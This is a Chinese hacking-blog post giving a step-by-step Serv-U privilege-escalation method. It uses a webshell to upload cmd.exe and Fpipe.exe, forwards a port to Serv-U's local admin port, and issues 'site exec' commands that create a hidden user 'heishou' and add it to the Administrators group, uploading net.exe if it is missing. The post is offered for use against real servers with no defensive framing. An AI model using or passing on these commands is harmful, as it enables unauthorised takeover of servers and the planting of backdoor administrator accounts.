首页 » 技术文章 » 浏览内容

Serv-U服务器提权之端口转发

344 0 发表评论

前面有朋友问到。如果说Serv-u的目录没有修改权限怎么办 

这里也给大家做下解答。 如果说serv-u服务器没有修改权限的话。

那么我就需要做下端口转发,与前面的讲的lxc的转发一样,不同的只是转发的端口不一样。

前面是将其他端口转发到3389的端口上。可是这里要用到的是将其他端口映射到43958端口上 具体什么端口可以随意 只要不占用。

方法如下:

1.查看SERV-U是否有可读可写可修改权限

2.如果没有 考虑用SERV-U来端口转发

3.上传cmd.exe和Fpipe.exe进行端口转发 运行一下命令:

Fpipe.exe -v -l 44959 -r 43958 127.0.0.1

(这里webshell必须要有dos权限,也就是要可以运行CMD命令)

4.本机搭建SERV-U 端口为:45959 IP地址为 提权目标IP 账户为默认的


5.本机cmd链接FTP 运行一下命令

Quote site exec net user heishou 1234567 /add
Quote site exec net localgroup administrators heishou /add
(因为前面我们以前做了端口转发所以现在我们本地的serv-u就相当于服务器上的serv-u)

6.如果命令运行不成功 也就是说管理员删除了net程序 那么我们就给他上传一个net程序

这篇文章希望能够给大家带来帮助,另外恭祝大家,提权提到手抽筋。。。

标签:

评论 共 0 条 (RSS 2.0) 发表 评论

  1. 暂无评论,快来抢沙发!

发表评论

  •   没有头像?

关注我们,实时联系

通知公告">更多...

♥如果喜欢本站可以直接点击订阅博客
♥点击此加入晓残博客会员群加入扣群
♥本站免费提供加密解密服务点击解密
♥伙伴们喜欢本站赏个好评呗

关注微信

有偿服务

博客统计

  • 日志总数:477 篇
  • 评论数目:1472 条
  • 标签总数:40 个
  • 页面总数:8 个
  • 分类总数:17 个
  • 友链总数:24 个
  • 建站日期:2011-02-13
  • 运行天数:2123 天
  • 最后更新:2016-12-6

订阅博客